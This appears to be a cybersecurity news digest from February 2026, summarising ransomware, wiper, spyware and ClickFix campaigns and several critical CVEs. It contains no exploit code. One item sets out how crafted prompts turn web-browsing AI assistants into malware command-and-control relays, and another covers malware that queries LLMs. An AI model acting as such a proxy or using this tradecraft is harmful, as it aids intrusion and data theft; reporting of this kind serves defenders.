
News Summary

Last updated: 20:00 18/02/2026 UTC
  • Silver Fox Exploits Microsoft-Signed WatchDog Driver to Deploy ValleyRAT Malware The threat actor Silver Fox has been exploiting a previously unknown vulnerable driver associated with WatchDog Anti-malware to deploy ValleyRAT malware. The driver, 'amsdk.sys' (version 1.0.600), is a validly signed Windows kernel device driver built on the Zemana Anti-Malware SDK. This driver allows arbitrary process termination and local privilege escalation, enabling the attackers to neutralize endpoint protection products and deploy the ValleyRAT remote access trojan. The campaign, first observed in late May 2025, targets Chinese-speaking victims using various social engineering techniques and trojanized software. The WatchDog driver has been patched, but attackers have adapted by modifying the driver to bypass hash-based blocklists. Silver Fox, also known as SwimSnake and UTG-Q-1000, is highly active and organized, targeting domestic users and companies to steal secrets and defraud victims. Recently, a newly identified cryptojacking campaign has been uncovered, spreading through pirated software installers. This campaign deploys system-level malware using a customised XMRig miner and a controller component for persistence. The controller, named Explorer.exe, functions as a state-driven orchestrator. The malware includes a hardcoded expiration date of December 23, 2025, for self-removal. The campaign uses a vulnerable signed driver, WinRing0x64.sys, to gain kernel-level access and modifies CPU registers to disable hardware prefetchers, boosting mining performance. The campaign connects to the Kryptex mining pool at xmr-sg.kryptex.network:8029. Read
  • Unauthenticated Remote Code Execution in Grandstream GXP1600 VoIP Phones A critical vulnerability (CVE-2026-2329) in Grandstream GXP1600 series VoIP phones allows unauthenticated remote code execution (RCE) with root privileges. The flaw, a stack-based buffer overflow, stems from the device's web-based API service. The vulnerability affects multiple GXP1600 models and has been addressed in firmware version 1.0.7.81. Exploiting this flaw could enable attackers to extract stored credentials, intercept phone calls, and eavesdrop on VoIP conversations. The issue was discovered by Rapid7 researcher Stephen Fewer and demonstrated via a Metasploit exploit module. Read
  • Spanish Court Orders NordVPN and ProtonVPN to Block LaLiga Piracy Streams A Spanish court has ordered NordVPN and ProtonVPN to block 16 websites facilitating piracy of LaLiga football matches. The order applies to a dynamic list of IP addresses in Spain and was issued without a hearing. LaLiga and Telefónica must preserve digital evidence of unlawful transmissions. The ruling aligns with similar decisions in France and recognizes VPN providers' liability for piracy. Both VPN providers have questioned the decision's validity and process. LaLiga has previously targeted Cloudflare for facilitating illegal sports streaming and demonstrated that VPN providers fall under the EU Digital Services Regulation. NordVPN criticized the blocking approach, suggesting that hosting providers should be targeted instead, and noted that free VPN services remain a loophole for piracy. Read
  • Notepad++ Update Mechanism Exploited to Deliver Malicious Payloads Notepad++ version 8.8.9 was released to address a security flaw in its WinGUp update tool that allowed attackers to push malicious executables instead of legitimate updates. Users reported incidents where the updater spawned a malicious AutoUpdater.exe that collected device information and exfiltrated it to a remote site. The flaw was mitigated by enforcing updates only from GitHub and later by requiring signature verification for all updates. Security researchers noted targeted attacks against organizations with interests in East Asia, where Notepad++ processes were used to gain initial access. The attack involved an infrastructure-level compromise at the hosting provider level, allowing malicious actors to intercept and redirect update traffic. The incident commenced in June 2025 and continued until December 2025, with the Notepad++ website later migrated to a new hosting provider. The attackers were likely Chinese state-sponsored threat actors, selectively redirecting update requests from certain users to malicious servers. The hosting provider for the update feature was compromised, enabling targeted traffic redirections. The attackers regained access using previously obtained internal service credentials. Notepad++ has since migrated all clients to a new hosting provider with stronger security and plans to enforce mandatory certificate signature verification in version 8.9.2. The compromise involved shared hosting infrastructure rather than a flaw in the software's code, with attackers gaining access at the hosting provider level to intercept and manipulate traffic bound for the Notepad++ update endpoint. Direct server access by the attackers ended on September 2, 2025, but credentials associated with internal services remained exposed until December 2, 2025, allowing continued traffic redirection. The hosting provider confirmed no additional customers were affected. 
Notepad++ version 8.9.2 introduced a 'double-lock' design for its update mechanism, including verifying the signed installer from GitHub and checking the signed XML from the notepad-plus-plus.org domain. The auto-updater now removes libcurl.dll to eliminate DLL side-loading risk, removes unsecured cURL SSL options, and restricts plugin management execution to programs signed with the same certificate as WinGUp. Users can exclude the auto-updater during UI installation or deploy the MSI package with the NOUPDATER=1 flag. The threat group Lotus Blossom, linked to China, was involved in the compromise, using a custom backdoor called 'Chrysalis' as part of the attack chain. Notepad++ version 8.9.2 also addresses a high-severity vulnerability (CVE-2026-25926, CVSS score: 7.3) that could result in arbitrary code execution in the context of the running application. An Unsafe Search Path vulnerability (CWE-426) exists when launching Windows Explorer without an absolute executable path, which may allow execution of a malicious explorer.exe if an attacker can control the process working directory. Read
  • Keenadu Android Backdoor Discovered in Firmware and Google Play Apps A sophisticated Android malware called Keenadu has been discovered embedded in firmware from multiple device brands and distributed through various vectors, including Google Play apps. The malware provides attackers with unrestricted control over infected devices, enabling broad-range data theft and other malicious activities. As of February 2026, 13,715 devices have been confirmed infected, primarily in Russia, Japan, Germany, Brazil, and the Netherlands. The malware's capabilities include compromising all installed applications, installing any apps from APK files, and monitoring user activities, including incognito browsing. Kaspersky researchers compare Keenadu to the Triada malware family, which was found in counterfeit Android devices last year. Keenadu has been detected in Alldocube iPlay 50 mini Pro firmware dating back to August 18, 2023, and is embedded within tablet firmware with valid digital signatures. The malware has also been found in smart home camera apps on Google Play with 300,000 downloads, which are no longer available. Read
  • Figure Fintech Breach Exposes 967,200 Accounts via Social Engineering Figure Technology Solutions, a blockchain-based fintech firm, suffered a data breach affecting nearly 1 million accounts. Hackers stole personal and contact information through a social engineering attack. The breach was attributed to the ShinyHunters extortion group, which leaked 2.5GB of data from loan applicants. The attackers impersonated IT support to trick employees into providing access to SSO accounts, gaining entry to various enterprise applications. Read
  • Critical vulnerabilities in popular VSCode extensions enable RCE and file theft Multiple high-to-critical severity vulnerabilities in popular VSCode extensions, collectively downloaded over 125 million times, expose developers to remote code execution (RCE) and file theft. The affected extensions include Live Server, Code Runner, Markdown Preview Enhanced, and Microsoft Live Preview. Researchers at Ox Security discovered these flaws in June 2025 but received no response from maintainers. Exploitation could lead to lateral movement, data exfiltration, and system takeover in corporate environments. Microsoft silently fixed the Live Preview vulnerability in version 0.4.16 released in September 2025. Read
Last updated: 15:15 18/02/2026 UTC
  • Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support and PRA BeyondTrust has patched a critical pre-authentication remote code execution (RCE) vulnerability (CVE-2026-1731, CVSS 9.9) in Remote Support (RS) and Privileged Remote Access (PRA) products. The flaw could allow unauthenticated attackers to execute OS commands in the context of the site user, leading to unauthorized access, data exfiltration, and service disruption. The vulnerability affects RS versions 25.3.1 and prior, and PRA versions 24.3.4 and prior. Patches are available in RS versions 25.3.2 and later, and PRA versions 25.1.1 and later. Self-hosted customers must manually apply updates if not subscribed to automatic updates. The vulnerability was discovered on January 31, 2026, with approximately 11,000 exposed instances identified, including around 8,500 on-prem deployments. BeyondTrust secured all RS/PRA cloud systems by February 2, 2026. The flaw was discovered by Harsh Jaiswal and the Hacktron AI team. Threat actors can exploit the flaw through maliciously crafted client requests in low-complexity attacks that do not require user interaction. In June 2025, BeyondTrust fixed a high-severity RS/PRA Server-Side Template Injection vulnerability. Attackers have begun actively exploiting the CVE-2026-1731 vulnerability in the wild, abusing the get_portal_info endpoint to extract the x-ns-company value before establishing a WebSocket channel. A proof-of-concept exploit targeting the /get_portal_info endpoint was published on GitHub. CISA has added CVE-2026-1731 to its Known Exploited Vulnerabilities (KEV) catalog and ordered U.S. government agencies to secure their systems against the flaw by February 16, 2026. CISA also added four other vulnerabilities to its KEV catalog, including CVE-2026-2441, CVE-2024-7694, CVE-2020-7796, and CVE-2008-0015. CVE-2026-2441 is a use-after-free vulnerability in Google Chrome with a CVSS score of 8.8. 
CVE-2024-7694 is an arbitrary file upload vulnerability in TeamT5 ThreatSonar Anti-Ransomware versions 3.4.5 and earlier with a CVSS score of 7.2. CVE-2020-7796 is a server-side request forgery (SSRF) vulnerability in Synacor Zimbra Collaboration Suite (ZCS) with a CVSS score of 9.8. CVE-2008-0015 is a stack-based buffer overflow vulnerability in Microsoft Windows Video ActiveX Control with a CVSS score of 8.8. Google acknowledged that an exploit for CVE-2026-2441 exists in the wild. A report published by threat intelligence firm GreyNoise in March 2025 revealed that a cluster of about 400 IP addresses was actively exploiting multiple SSRF vulnerabilities, including CVE-2020-7796, to target susceptible instances in the U.S., Germany, Singapore, India, Lithuania, and Japan. The exploit for CVE-2008-0015 may connect to a remote server and download other malware, including the Dogkild worm. Federal Civilian Executive Branch (FCEB) agencies are recommended to apply the necessary fixes by March 10, 2026, for optimal protection. Read
  • Zscaler Acquires SquareX to Enhance Browser Security Zscaler has acquired SquareX, a browser security firm, to integrate its Browser Detection and Response (BDR) solution into its Zero Trust Exchange platform. The acquisition aims to extend security to unmanaged devices, allowing organizations to secure users within their preferred browsers like Google Chrome and Microsoft Edge without needing a full agent or a separate enterprise browser. The deal closed on February 5, 2026, and is part of Zscaler's strategy to enhance its security capabilities. SquareX's technology provides real-time threat detection and response directly within the browser, addressing threats like malicious extensions, phishing, and data leakage. Zscaler plans to complete the integration within the next few months, anticipating rapid demand despite SquareX's relatively small installed base. Read
  • VoidLink Malware Framework Targets Cloud and Container Environments VoidLink is a Linux-based command-and-control (C2) framework capable of long-term intrusion across cloud and enterprise environments. The malware generates implant binaries designed for credential theft, data exfiltration, and stealthy persistence on compromised systems. VoidLink combines multi-cloud targeting with container and kernel awareness in a single Linux implant, fingerprinting environments across major cloud providers and adjusting its behavior based on what it finds. The implant harvests credentials from environment variables, configuration files, and metadata APIs, and profiles security controls, kernel versions, and container runtimes before activating additional modules. VoidLink employs a modular plugin-based architecture that loads functionality as needed, including credential harvesting, environment fingerprinting, container escape, Kubernetes privilege escalation, and kernel-level stealth. The malware uses AES-256-GCM over HTTPS for encrypted C2 traffic, designed to resemble normal web activity. VoidLink stands out for its apparent development using a large language model (LLM) coding agent with limited human review, as indicated by unusual development artifacts such as structured "Phase X:" labels, verbose debug logs, and documentation left inside the production binary. The research concludes that VoidLink is not a proof-of-concept but an operational implant with live infrastructure, highlighting how AI-assisted development is lowering the barrier to producing functional, modular, and hard-to-detect malware. A previously unknown threat actor tracked as UAT-9921 has been observed leveraging VoidLink in campaigns targeting the technology and financial services sectors. UAT-9921 has been active since 2019, although they have not necessarily used VoidLink over the duration of their activity. 
The threat actor uses compromised hosts to install VoidLink command-and-control (C2), which are then used to launch scanning activities both internal and external to the network. VoidLink is deployed as a post-compromise tool, allowing the adversary to sidestep detection. The threat actor has been observed deploying a SOCKS proxy on compromised servers to launch scans for internal reconnaissance and lateral movement using open-source tools like Fscan. VoidLink uses three different programming languages: ZigLang for the implant, C for the plugins, and GoLang for the backend. The framework supports compilation on demand for plugins, providing support for the different Linux distributions that might be targeted. The plugins allow for gathering information, lateral movement, and anti-forensics. VoidLink comes fitted with a wide range of stealth mechanisms to hinder analysis, prevent its removal from the infected hosts, and even detect endpoint detection and response (EDR) solutions and devise an evasion strategy on the fly. VoidLink has an auditability feature and a role-based access control (RBAC) mechanism, which consists of three role levels: SuperAdmin, Operator, and Viewer. There are signs that there exists a main implant that has been compiled for Windows and can load plugins via a technique called DLL side-loading. Read
  • UNC5518 Access-as-a-Service Campaign via ClickFix and Fake CAPTCHA Pages Microsoft and Malwarebytes have disclosed a DNS-based ClickFix variant that marks the first documented use of the `nslookup` command to stage and deliver malicious payloads. This technique abuses DNS queries to retrieve a PowerShell script embedded in the `NAME:` field of a DNS response from an attacker-controlled server (84[.]21.189[.]20), which then deploys ModeloRAT via a Python runtime and VBScript persistence mechanism. The attack chain begins with fake CAPTCHA lures, followed by social engineering tactics (e.g., fake system alerts, browser crashes, or instructional videos) to coerce victims into executing the `nslookup` command, which downloads a ZIP archive containing the final payload. This evolution builds on earlier ClickFix tactics, including ConsentFix (Azure CLI OAuth abuse), CrashFix (malicious Chrome extensions triggering browser crashes), and SyncAppvPublishingServer.vbs (Google Calendar dead drops). The latest DNS-based approach demonstrates the campaign’s adaptability, leveraging trusted native tools (`nslookup`), DNS as a C2 channel, and psychological manipulation (urgency tactics) to bypass security controls. Concurrently, ClickFix campaigns continue to expand with cross-platform targeting (Windows/Linux/macOS), AI platform abuse (ChatGPT, Grok, Claude), and weaponized SaaS infrastructure (Google Groups, Pastebin) to distribute payloads like Lumma Stealer and Odyssey Stealer. The integration of DNS staging, browser-native execution, and multi-stage loaders underscores the campaign’s resilience despite 2025 law enforcement disruptions, with actors refining tradecraft to maximize evasion via social engineering, steganography, and legitimate service abuse. Read
  • State-Backed Hackers Abuse AI Models for Advanced Cyber Attacks Google's Threat Intelligence Group (GTIG) has identified new malware families that leverage artificial intelligence (AI) and large language models (LLMs) for dynamic self-modification during execution. These malware families, including PromptFlux, PromptSteal, FruitShell, QuietVault, and PromptLock, demonstrate advanced capabilities for evading detection and maintaining persistence. PromptFlux, an experimental VBScript dropper, uses Google's LLM Gemini to generate obfuscated VBScript variants and evade antivirus software. It attempts persistence via Startup folder entries and spreads laterally on removable drives and mapped network shares. The malware is in a development or testing phase and is assessed to be financially motivated. PromptSteal is a data miner written in Python that queries the LLM Qwen2.5-Coder-32B-Instruct to generate one-line Windows commands to collect information and documents in specific folders and send the data to a command-and-control (C2) server. It is used by the Russian state-sponsored actor APT28 in attacks targeting Ukraine. State-backed hackers from China (APT31, Temp.HEX), Iran (APT42), North Korea (UNC2970), and Russia have used Gemini AI for all stages of an attack, including reconnaissance, phishing lure creation, C2 development, and data exfiltration. Chinese threat actors used Gemini to automate vulnerability analysis and provide targeted testing plans against specific US-based targets. Iranian adversary APT42 leveraged Gemini for social engineering campaigns and to speed up the creation of tailored malicious tools. The use of AI in malware enables adversaries to create more versatile and adaptive threats, posing significant challenges for cybersecurity defenses. Various threat actors, including those from China, Iran, and North Korea, have been observed abusing AI models like Gemini across different stages of the attack lifecycle. 
The underground market for AI-powered cybercrime tools is also growing, with offerings ranging from deepfake generation to malware development and vulnerability exploitation. Read
  • Russian Threat Actors Target Ukrainian and Polish Organizations with Data-Wiping Malware and LotL Tactics Russian threat actors, specifically the Sandworm group, have targeted Ukrainian organizations and Poland's power sector using living-off-the-land (LotL) tactics and deploying data-wiping malware. The attacks, which began in June 2025, involved minimal malware to reduce detection and included the use of web shells and legitimate tools for reconnaissance and data theft. The threat actors exploited unpatched vulnerabilities to deploy web shells on public-facing servers, gaining initial access. They then used various tactics, including PowerShell commands, scheduled tasks, and legitimate software, to evade detection and perform reconnaissance. The attacks were characterized by the use of legitimate tools and minimal malware, demonstrating the actors' deep knowledge of Windows native tools. In addition to LotL tactics, Sandworm deployed multiple data-wiping malware families in June and September 2025, targeting Ukraine's education, government, and grain sectors. The grain sector, a vital economic sector, was targeted to disrupt Ukraine's war economy. The data-wiping malware used included ZeroLot and Sting, with initial access achieved by UAC-0099, who then transferred access to APT44 for wiper deployment. The activity is confirmed to be of Russian origin, with specific attribution to the Sandworm group. In December 2025, Sandworm targeted Poland's power sector with a new wiper malware called DynoWiper, aiming to disrupt the energy infrastructure. The attack, which occurred on December 29 and 30, 2025, targeted two combined heat and power (CHP) plants and a system managing renewable energy sources. The attack was unsuccessful in causing disruption, and Polish authorities attributed it to Russian services. The attack coincided with the tenth anniversary of Sandworm's 2015 attack on Ukraine's power grid. 
A new Russia-aligned threat activity cluster, InedibleOchotense, impersonated ESET in phishing attacks targeting Ukrainian entities starting in May 2025. This campaign involved sending spear-phishing emails and Signal text messages containing links to trojanized ESET installers, which delivered the Kalambur backdoor. InedibleOchotense is linked to the Sandworm (APT44) hacking group and has been observed conducting destructive campaigns in Ukraine, including the deployment of wiper malware ZEROLOT and Sting. Another Russia-aligned threat actor, RomCom, launched spear-phishing campaigns in mid-July 2025 exploiting a WinRAR vulnerability (CVE-2025-8088) targeting various sectors in Europe and Canada. RomCom also targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent. The activity has been attributed with medium-to-high confidence to Unit 29155 of Russia's Main Directorate of the General Staff of the Armed Forces of the Russian Federation, also known as GRU. The targeted entity had worked for a city with close ties to Ukraine in the past. The ESET report noted that other Russian-aligned APT groups also maintained their focus on Ukraine and countries with strategic ties to Ukraine, while also expanding their operations to European entities. Gamaredon remained the most active APT group targeting Ukraine, with a noticeable increase in intensity and frequency of its operations during the reported period. Gamaredon selectively deployed one of Turla’s backdoors, indicating a rare instance of cooperation between Russia-aligned APT groups. Gamaredon’s toolset continued to evolve, incorporating new file stealers or tunneling services. The cyber attack on the Polish power grid in December 2025 was attributed with medium confidence to a Russian state-sponsored hacking group known as ELECTRUM. 
The attack targeted distributed energy resources (DERs) and affected communication and control systems at combined heat and power (CHP) facilities and systems managing renewable energy systems. ELECTRUM and KAMACITE share overlaps with the Sandworm cluster, with KAMACITE focusing on initial access and ELECTRUM conducting operations that bridge IT and OT environments. The attackers gained access to operational technology systems critical to grid operations and disabled key equipment beyond repair at the site. The attack was opportunistic and rushed, with the hackers attempting to inflict as much damage as possible by wiping Windows-based devices and resetting configurations. The majority of the equipment targeted was related to grid safety and stability monitoring. The coordinated attack on Poland's power grid in late December targeted multiple distributed energy resource (DER) sites across the country, including combined heat and power (CHP) facilities and wind and solar dispatch systems. Although the attacker compromised operational technology (OT) systems, damaging "key equipment beyond repair," they failed to disrupt power; the affected sites total 1.2 GW, or 5% of Poland's energy supply. Based on public reports, there are at least 12 confirmed affected sites. However, researchers at Dragos, an industrial control systems (ICS) and operational technology (OT) security company, say that the number is approximately 30. Dragos attributes the attack with moderate confidence to a Russian threat actor it tracks as Electrum, which, although it overlaps with Sandworm (APT44), the researchers underline is a distinct activity cluster. Electrum targeted exposed and vulnerable systems involved in dispatch and grid-facing communication, remote terminal units (RTUs), network edge devices, monitoring and control systems, and Windows-based machines at DER sites. 
Electrum successfully disabled communications equipment at multiple sites, resulting in a loss of remote monitoring and control, but power generation on the units continued without interruption. Certain OT/ICS devices were disabled, and their configurations were corrupted beyond recovery, while Windows systems at the sites were wiped. Even if the attacks had been successful in cutting the power, the relatively narrow targeting scope wouldn’t have been enough to cause a nationwide blackout in Poland. However, they could have caused significant destabilization of the system frequency. "Such frequency deviations have caused cascading failures in other electrical systems, including the 2025 Iberian grid collapse," the researchers say. CERT Polska revealed that coordinated cyber attacks targeted more than 30 wind and photovoltaic farms, a private company from the manufacturing sector, and a large combined heat and power plant (CHP) in Poland on December 29, 2025. The attacks were attributed to a threat cluster dubbed Static Tundra, which is linked to Russia's Federal Security Service's (FSB) Center 16 unit. The attacks had a purely destructive objective but did not affect the ongoing production of electricity or the heat supply to end users. The attackers gained access to the internal network of power substations associated with a renewable energy facility to carry out reconnaissance and disruptive activities, including damaging the firmware of controllers, deleting system files, or launching custom-built wiper malware codenamed DynoWiper. In the intrusion aimed at the CHP, the adversary engaged in long-term data theft dating back to March 2025, enabling them to escalate privileges and move laterally across the network. The attackers' attempts to detonate the wiper malware were unsuccessful. The targeting of the manufacturing sector company is believed to be opportunistic, with the threat actor gaining initial access via a vulnerable Fortinet perimeter device. 
At least four different versions of DynoWiper have been discovered to date. The wiper's functionality involves initializing a pseudorandom number generator (PRNG) called Mersenne Twister, enumerating files and corrupting them using the PRNG, and deleting files. The malware does not have a persistence mechanism, a way to communicate with a command-and-control (C2) server, or the ability to execute shell commands, and it does not attempt to hide the activity from security programs. The attack targeting the manufacturing sector company involved the use of a PowerShell-based wiper dubbed LazyWiper, which overwrites files on the system with pseudorandom 32-byte sequences to render them unrecoverable. The malware used in the incident involving renewable energy farms was executed directly on the HMI machine. In the CHP plant and the manufacturing sector company, the malware was distributed within the Active Directory domain via a PowerShell script executed on a domain controller. The attacker used credentials obtained from the on-premises environment in attempts to gain access to cloud services, downloading selected data from services such as Exchange, Teams, and SharePoint. The attacker was particularly interested in files and email messages related to OT network modernization, SCADA systems, and technical work carried out within the organizations. The attack on Poland's energy sector in December 2025 was the first large-scale attack against decentralized energy resources (DERs) like wind turbines and solar farms. The attack occurred during a period when Poland was struggling with low temperatures and snowstorms just before the New Year. Dragos assessed with moderate confidence that the activity reflects tradecraft and objectives in line with the Electrum threat group, which overlaps with Sandworm. Electrum has worked alongside another threat actor, tracked as Kamacite, to conduct destructive attacks against Ukrainian ISPs and persistent scanning of industrial devices in the US. 
Kamacite gained initial access and persistence against organizations, and Electrum executed follow-on activity. Dragos has tracked Kamacite activities against the European ICS/OT supply chain since late 2024. The attack on Poland's energy sector was significant because it was the first major attack against decentralized energy resources (DERs). There was no evidence that the adversary had full control of the DERs, and there was no attempt to mis-operate these resources. Poland was fortunate because DERs make up a smaller portion of its energy portfolio than in some other countries. If this same style of attack happened in the US, Australia, or certain parts of Europe where DERs are more prevalent, it could have been potentially catastrophic for the system. The attack highlighted the ongoing threat faced by the energy sector, with threat actors gaining initial access through vulnerable Internet-facing edge devices before deploying wipers that damaged remote terminal units (RTUs). CISA advised OT operators to prioritize updates that allow firmware verification and to immediately change default passwords on devices such as edge equipment. Dragos recommended that organizations ensure their architecture is defensible through methods like strict authorization practices, OT/IT segmentation, strict vendor access governance, secure remote access, and ICS network visibility and monitoring. Read
  • PhantomCaptcha Campaign and CANFAIL Malware Attacks Targeting Ukraine Aid and Government Groups A coordinated spear-phishing campaign, dubbed PhantomCaptcha, targeted organizations involved in Ukraine's war relief efforts. The campaign delivered a remote access trojan (RAT) using a WebSocket for command-and-control (C2). The attack took place on October 8, 2025, and impersonated the Ukrainian President's Office, using weaponized PDFs and fake Zoom meetings to trick victims into executing malicious PowerShell commands. The malware performed reconnaissance and enabled remote command execution and data exfiltration. The campaign targeted members of the International Red Cross, Norwegian Refugee Council, UNICEF Ukraine, Council of Europe's Register of Damage for Ukraine, and Ukrainian regional government administrations. The malware was hosted on Russian-owned infrastructure and connected to a remote WebSocket server for C2 operations. The campaign took six months to prepare and involved a sophisticated multi-stage spear-phishing operation, with the weaponized PDF appearing as a legitimate governmental communique. The attack chain included a heavily obfuscated PowerShell downloader to bypass signature-based defenses and hinder analysis. The second-stage payload collected various user data, which was XOR-encrypted and sent to the C2 server. The final payload was a lightweight PowerShell backdoor that repeatedly reconnected to the remote WebSocket server. The campaign demonstrated extensive operational planning, compartmentalized infrastructure, and deliberate exposure control, with the infrastructure active only for a single day. A previously undocumented threat actor has been attributed to attacks targeting Ukrainian organizations with malware known as CANFAIL. Google Threat Intelligence Group (GTIG) described the hack group as possibly affiliated with Russian intelligence services. 
The threat actor is assessed to have targeted defense, military, government, and energy organizations within the Ukrainian regional and national governments. The group has also exhibited growing interest in aerospace organizations, manufacturing companies with military and drone ties, nuclear and chemical research organizations, and international organizations involved in conflict monitoring and humanitarian aid in Ukraine. Read

Latest updates

Critical Authentication Bypass Flaw in Honeywell CCTV Systems

Updated: · First: 18.02.2026 22:58 · 📰 1 src / 1 article

A critical vulnerability (CVE-2026-1670) in multiple Honeywell CCTV products allows unauthenticated attackers to change recovery email addresses, enabling account takeover and unauthorized access to camera feeds. The flaw, rated 9.8 in severity, affects mid-level surveillance products used in commercial, industrial, and critical infrastructure settings. As of February 17, 2026, no public exploitation has been reported, but CISA advises mitigations to reduce risk.

AI Assistants Abused as Command-and-Control Proxies

Updated: 18.02.2026 22:18 · First: 17.02.2026 20:08 · 📰 3 src / 3 articles

Researchers have demonstrated that AI assistants like Microsoft Copilot and xAI Grok can be exploited as command-and-control (C2) proxies. This technique leverages the AI's web-browsing capabilities to create a bidirectional communication channel for malware operations, enabling attackers to blend into legitimate enterprise communications and evade detection. The method, codenamed AI as a C2 proxy, allows attackers to generate reconnaissance workflows, script actions, and dynamically decide the next steps during an intrusion. The attack requires prior compromise of a machine and installation of malware, which then uses the AI assistant as a C2 channel through specially crafted prompts. This approach bypasses traditional defenses like API key revocation or account suspension. According to new findings from Check Point Research (CPR), platforms including Grok and Microsoft Copilot can be manipulated through their public web interfaces to fetch attacker-controlled URLs and return responses. The AI service acts as a proxy, relaying commands to infected machines and sending stolen data back out, without requiring an API key or even a registered account. The method relies on AI assistants that support URL fetching and content summarization, allowing attackers to tunnel encoded data through query parameters and receive embedded commands in the AI's reply. Malware can interact with the AI interface invisibly using a WebView2 browser component inside a C++ program. The research also outlined a broader trend: malware that integrates AI into its runtime decision-making, sending host information to a model and receiving guidance on actions to prioritize.

Predator Spyware Exploits Zero-Click Infection Vector via Malicious Ads

Updated: 18.02.2026 19:30 · First: 04.12.2025 22:47 · 📰 4 src / 5 articles

Predator spyware, developed by Intellexa, has been using a zero-click infection mechanism called Aladdin, which infects targets by displaying malicious advertisements. This vector is hidden behind shell companies across multiple countries and leverages the commercial mobile advertising system to deliver malware. The spyware is still operational and actively developed, with additional delivery vectors like Triton targeting Samsung Exynos devices. The infection occurs when a target views a malicious ad, which triggers a redirection to Intellexa’s exploit delivery servers. The ads are served through a complex network of advertising firms, making defense measures challenging. Despite sanctions and investigations, including fines from the Greek Data Protection Authority, Intellexa remains active and prolific in zero-day exploitation. Recent leaks reveal that Intellexa's Predator spyware has been marketed under various names, including Helios, Nova, Green Arrow, and Red Arrow. The spyware exploits multiple zero-day vulnerabilities in Android and iOS devices, and uses frameworks like JSKit for native code execution. Intellexa also has the capability to remotely access the surveillance systems of its customers using TeamViewer. The spyware collects extensive data from targeted devices, including messaging apps, calls, emails, device locations, screenshots, passwords, and other on-device information. New research has confirmed that Predator spyware was used to target an Angolan journalist, Teixeira Cândido, in May 2024 via a WhatsApp link. The infection lasted less than one day and was removed when the device was restarted. Attackers made 11 additional attempts to re-infect the device, all of which failed. Predator spyware incorporates advanced anti-analysis mechanisms and has explicit checks to avoid running in U.S. and Israeli locales.

Unauthenticated Remote Code Execution in Grandstream GXP1600 VoIP Phones

Updated: · First: 18.02.2026 18:35 · 📰 1 src / 1 article

A critical vulnerability (CVE-2026-2329) in Grandstream GXP1600 series VoIP phones allows unauthenticated remote code execution (RCE) with root privileges. The flaw, a stack-based buffer overflow, stems from the device's web-based API service. The vulnerability affects multiple GXP1600 models and has been addressed in firmware version 1.0.7.81. Exploiting this flaw could enable attackers to extract stored credentials, intercept phone calls, and eavesdrop on VoIP conversations. The issue was discovered by Rapid7 researcher Stephen Fewer and demonstrated via a Metasploit exploit module.

SmarterMail Authentication Bypass Exploited Post-Patch

Updated: 18.02.2026 18:27 · First: 22.01.2026 11:46 · 📰 4 src / 4 articles

A critical authentication bypass vulnerability in SmarterMail email software (WT-2026-0001, CVE-2026-23760) has been actively exploited in the wild just two days after a patch was released. The flaw allows attackers to reset the system administrator password via a crafted HTTP request, leading to remote code execution (RCE) on the underlying operating system. The vulnerability was patched on January 15, 2026, but attackers reverse-engineered the patch to exploit it. Over 6,000 SmarterMail servers were found exposed online and likely vulnerable to attacks exploiting the flaw. Shadowserver is tracking these servers, with more than 4,200 in North America and nearly 1,000 in Asia. Macnica threat researcher Yutaka Sejiyama found over 8,550 SmarterMail instances still vulnerable. CISA added the vulnerability to its list of actively exploited vulnerabilities, ordering U.S. government agencies to secure their servers by February 16. Threat actors rapidly shared proof-of-concept exploits, offensive tools, and stolen administrator credentials related to SmarterMail vulnerabilities on underground Telegram channels and cybercrime forums. SmarterTools was breached in January 2026 after attackers exploited an unpatched SmarterMail server running on an internal VM. Ransomware operators gained initial access through SmarterMail vulnerabilities and waited before triggering encryption payloads. Over 34,000 servers were found on Shodan with indications of running SmarterMail, with 1,185 vulnerable to authentication bypass or RCE flaws. CISA added CVE-2026-24423 to the Known Exploited Vulnerabilities catalog in February 2026, confirming active ransomware exploitation.

Microsoft Anti-Spam Service Misidentifies Safe URLs in Exchange Online and Teams

Updated: 18.02.2026 18:26 · First: 09.09.2025 16:40 · 📰 3 src / 4 articles

Microsoft is addressing a bug in its anti-spam service that incorrectly blocks URLs in Exchange Online and Microsoft Teams, causing some emails to be quarantined. The issue began on September 5, 2025, affecting users who received false alerts about malicious URLs. Over 6,000 URLs have been identified as affected, and Microsoft is working to unblock them and recover any incorrectly flagged messages. The bug is due to the anti-spam engine mistakenly tagging URLs within other URLs as potentially malicious. Microsoft has deployed a partial fix and is continuing to address the impact. The incident has been classified as an event with noticeable user impact, although the exact number of affected customers and regions remains undisclosed. In a new development, another incident began on February 5, 2026, in which Exchange Online mistakenly flagged legitimate emails as phishing and quarantined them. This issue was caused by a new URL rule that incorrectly flagged some URLs as malicious. Microsoft worked to release quarantined emails and confirm that legitimate URLs were unblocked. The incident, tracked by Microsoft under EX1227432, was not fully resolved until February 12. The root cause was a logic error in a detection system designed to identify new credential phishing attacks, which also led to false positive alerts. Other security tools within Microsoft's detection infrastructure amplified the incident's impact, and a separate bug in the company's security signature systems further delayed efforts to roll back the flawed detection rules. Microsoft will issue a final report within five business days of full resolution. Similar issues have occurred throughout the year, including a May 2025 incident where a machine learning model incorrectly flagged Gmail emails as spam in Exchange Online.

Silver Fox Exploits Microsoft-Signed WatchDog Driver to Deploy ValleyRAT Malware

Updated: 18.02.2026 18:00 · First: 02.09.2025 11:39 · 📰 4 src / 8 articles

The threat actor Silver Fox has been exploiting a previously unknown vulnerable driver associated with WatchDog Anti-malware to deploy ValleyRAT malware. The driver, 'amsdk.sys' (version 1.0.600), is a validly signed Windows kernel device driver built on the Zemana Anti-Malware SDK. This driver allows arbitrary process termination and local privilege escalation, enabling the attackers to neutralize endpoint protection products and deploy the ValleyRAT remote access trojan. The campaign, first observed in late May 2025, targets Chinese-speaking victims using various social engineering techniques and trojanized software. The WatchDog driver has been patched, but attackers have adapted by modifying the driver to bypass hash-based blocklists. Silver Fox, also known as SwimSnake and UTG-Q-1000, is highly active and organized, targeting domestic users and companies to steal secrets and defraud victims. Recently, a newly identified cryptojacking campaign has been uncovered, spreading through pirated software installers. This campaign deploys system-level malware using a customised XMRig miner and a controller component for persistence. The controller, named Explorer.exe, functions as a state-driven orchestrator. The malware includes a hardcoded expiration date of December 23, 2025, for self-removal. The campaign uses a vulnerable signed driver, WinRing0x64.sys, to gain kernel-level access and modifies CPU registers to disable hardware prefetchers, boosting mining performance. The campaign connects to the Kryptex mining pool at xmr-sg.kryptex.network:8029.

